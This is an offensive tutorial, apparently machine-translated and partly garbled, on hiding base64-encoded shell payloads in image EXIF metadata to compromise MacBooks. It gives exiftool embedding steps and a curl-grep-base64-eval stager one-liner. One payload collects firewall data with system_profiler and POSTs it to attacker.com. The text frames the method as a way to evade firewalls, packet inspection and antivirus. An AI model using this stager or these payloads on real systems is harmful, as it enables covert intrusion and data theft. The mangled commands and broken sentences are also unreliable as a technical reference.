Complex shell scripts can be implanted in photo metadata and later used to exploit a MacBook. Not only can this technique obfuscate the true nature of an attack, it can also bypass network firewalls and system administrators.
In this attack scenario, a malicious command is embedded directly into the EXIF metadata of an image file. The attacker would host the malicious image on a public website such as Flickr and make it available to anyone for download. Then, a stager is created to download the image, extract the metadata, and execute the embedded command.
Double-clicking the image file does not execute the embedded command. That's another type of MacOS attack that we've covered in another article. Instead, the command is hidden in the metadata of the image and used as a payload delivery system.
The payloads and are two different aspects of the attack. The stager is used to download the image and execute the embedded payload, while the payload is the last code bit (embedded in the image) that is destined to execute one or more instructions.
Why are user data embedded in images?
So, why have a stager at all, if the attacker is already able to execute code on the target MacBook? Well, first of all different degrees of active evasion. In addition, stagers can be quite small, only ~ 1
In most scenarios it is not possible to hide a payload in an image file. not mandatory. However, in highly secure environments, where each domain is logged by firewall software, it may be beneficial to hide the content and source of the payload.
. 1 Firewall bypass
Software such as pfSense logs all domains and IP addresses visited by each device on the network. With commercial software like Fortinet's FortiGate Firewall, every packet can be thoroughly analyzed. These types of firewalls make it difficult for an attacker to use simple TCP connections made with Netcat, to remain on the compromised device, or to mute the network.
Using images to hide user data may make it difficult for sysadmins to identify traffic as malicious or suspicious.
. 2 Deep Packet Inspection Evasion
In secured environments, operating systems can be configured to use custom certificates that network administrators can use to decrypt data from and to devices on the network. With tools like Wireshark, it is possible to compile TCP streams and recreate image files with the captured raw data.
. 3 Antivirus Bypass
Premium Versions of Avast and AVG antivirus software can analyze and detect specific types of stacks and payloads. For example, AV software can identify most of Empire's stagers. In hardened network environments, a high level of obfuscation may be required to bypass detection signatures. Using stagers can make it difficult for AV software to recognize the true nature of a particular file.
Tools Familiar with Tools
Before proceeding, you should familiarize yourself with tools such as and ] system_profiler exiftool grep and Bash scripting before proceeding. All of these topics have already been treated in some way in zero bytes.
First, download the image you want to use for the attack. The stager (shown in a later step) does not save the image on the computer of the target. It does not have to be an image that is particularly relevant. For demonstration purposes, we can use my Twitter profile image which can be downloaded with wget and saved in the / tmp
directory . # 39; https: //pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg' -O image.jpg
- 2019-05-15 06: 50: 22-- https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg Resolving pbs.twimg.com (pbs.twimg.com) ... 184.108.40.206, 2606: 2800: 220: 1410: 489: 141e: 20bb: 12f6 Connecting to pbs.twimg.com (pbs.twimg.com) | 220.127.116.11 |: 443 ... connected. HTTP request sent, response expected ... 200 OK Length: 19316 (19K) [image/jpeg] Save as: "image.jpg" image.jpg 100% [=================================>] 18.86 KB 64.4 KB / s in 0.3 s 2019-05-02 06:50:25 (64.4 KB / s) - & # 39; image.jpg & # 39; stored [19316/19316]
In this example we first learn to execute a simple ] command . When the stager executes the payload embedded in the image, it creates an empty hacked file on the macOS desktop.
First use printf base64 and tr to encode the payload. Base64 encodes the string, while tr ( -d ) deletes line breaks ( n ). You should always put the payload ( touch ~ / desktop / hacked ) in single quotes.
printf # touch ~ / desktop / hacked & # 39; | base64 | tr -d & # 39; n & # 39;
A more complex payload that includes macOS ' system_profiler command can be used to perform situational awareness attacks and send the command to the attacker's server.
printf # d = $ (system_profiler SPFirewallDataType); curl -s --data "$ d" -X POST http://attacker.com/index.php' | base64 | tr-d n '
== ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA  it a step further, it would be possible to encode an entire stroke index, which has been compressed in a row. In my tests, there seemed to be no limit to how many characters can be embedded in a metadata tag.
cat /path/to/any_script.sh | base64 | tr -d & # 39; n & # 39;
ZnVuY3Rpb24gZXhlY19oYWNrKCkgeyAvdXNyL2Jpbi90b3VjaCB + L0Rlc2t0b3AvaGFja2VkOyB9O2V4ZWNfaGFjawo = . Step 3: Embed the payload into the image  Embed the encoded payload into the image, install exiftool  apt-get update && apt-get install exiftool -V
Read package lists ... Finished Create dependency tree Status information is read ... Done Note, select & # 39; libimage-exiftool-perl & # 39; instead of & # 39; exiftool & # 39; The following additional packages will be installed: libarchive-zip-perl (1.64-1) libmime-charset-perl (1.012.2-1) libposix-strptime-perl (0.13-1 + b5) libsombok3 (2.4.0-2) libunicode-linebreak-perl (0.0.20190101-1) Suggested packages: libencode-hanextra-pearl (0,23-5 + b1) libpod2-base-perl (0.043-2) The following NEW packages will be installed: libarchive-zip-perl (1.64-1) libimage-exiftool-perl (11.16-1) libmime-charset-perl (1.012.2-1) libposix-strptime-perl (0.13-1 + b5) libsombok3 (2.4.0-2) libunicode-linebreak-perl (0.0.20190101-1) 0 updated, 6 reinstalled, 0 removed and 0 not updated. Requires 3,629 kB of archives. After this process, 21.0 MB of additional space will be used. Would you like to continue? [Y/n]
Then delete any EXIF metadata that may be in the image.
exiftool -all = image.jpg
1 updated image files
Then use exiftool to add a metadata tag - it works with every available tag - that contains the encoded payload. The certificate tag is used in this demonstration.
exiftool -Certificate = & dgr; dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA == & # 39; image.jpg
1 image files have been updated
added with the following command exiftool . Note the coded string in line 13.
01 ExifTool version number: 11.16 02 File name: image.jpg 03 directory :. 04 File size: 21 kB 05 File modification date / time: 2019: 05: 02 06: 50: 57 + 00: 00 06 File access date / time: 2019: 05: 02 06: 50: 57 + 00: 00 07 Date / time of file entry change: 2019: 05: 02 06: 50: 57 + 00: 00 08 file permissions: rw-r - r-- 09 File type: JPEG 10 file extension: jpg 11 MIME type: image / jpeg 12 XMP Toolkit: Image :: ExifTool 11.16 13 Certificate: dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA == 14 image width: 400 15 image height: 400 16 coding process: Progressive DCT, Huffman coding 17 bits per sample: 8 18 color components: 3 19 Y Cb Cr subsampling: YCbCr4: 2: 0 (2 2) 20 image size: 400 x 400 21 megapixels: 0.160
Step 4: Upload the image to a website
Finding a suitable website is difficult. The criteria for this are manifold.
Many popular sites like Twitter, Imgur, and Instagram automatically delete metadata from images when uploading to protect users from accidentally uploading GPS coordinates that use them Cyberstalkers and cyberbullies can harass and find these users.
Images containing user data are deleted when uploading to mainstream websites. The candidate web site would need to be manually tested by first uploading the image, then downloading and verifying with exiftool if the embedded payload is still intact.
The security of the transport layer is indispensable for further enhancing concealment of this attack. The website hosting the image should use HTTPS to prevent system administrators from analyzing the GET request with surgical precision.
Ideally, the site used for the attack is visited regularly by the target. For example, if the destination visits a particular news site every morning, visiting this domain is not suspicious to system administrators who are monitoring traffic on the network. On the other hand, an unusual GET request to a foreign or adult website is likely to trigger some red flags. This type of information can be enumerated during the reconnaissance phase with hidden packet captures. The key is to make the traffic as normal as possible to the web behavior of the target.
In my quick attempts to extract metadata from images with native MacOS tools, none seemed to be able to access or view the particular string ("certificate"). ) of EXIF metadata embedded in the image. Fortunately, grep has the option -a that binaries (ie images) can be processed as if they were plain text so that the string "Certificate" can be found in the metadata
Below is an example of a stager that you can use to download images, extract and decode payload, and then execute the commands.
p = $ (curl -s https://website.com/image.jpg | grep Cert -a | sed's <[^>] *> // g & # 39;; base64-D ); eval $ p
Here are some things going on, so I'll break down each section of the stager.
- p = $ (...) - Most of the stager is included in a variable named "p" (aka payload ), which serves primarily to store the Image does not change Is stored directly on the MacOS hard disk of the target.
- curl -s website.com/image.jpg - Curl is used here to tacitly download the payload image from an attacker's Web site (-s). The image is immediately forwarded to the following grep command (|).
- grep Cert -a - grep picks up the raw image data and processes it as plain text (-a) while looking for the string "cert". This issue would appear in a terminal as shown below.
- sed's <[^> *> // g & # 39; - The above output is immediately available in this sed command. Sed removes all surrounding XML data (ie,
) and leaves only the encoded string.
- base64 -D - The encoded string is passed on This base64 command, where it is decoded with the -D option, eventually decodes the variable $ p Payload.
- Used to evaluate the variable as a command and effectively execute the payload in its variable form.
We can verify that the attack was successful by finding the "hacked" file on the macOS desktop.
Again, this is a very simple payload. More sophisticated attacks can include automated browser password dumping, microphones interception, situation data enumeration, privilege escalation, sudo password exfiltration, and more.
This is all to hide payload data in image metadata. Stay up to date, because I will show in a future article, how you can filter out data within images - without the use of metadata tags! Message to me on Twitter @tokyoneon_ if you have questions or leave a comment below.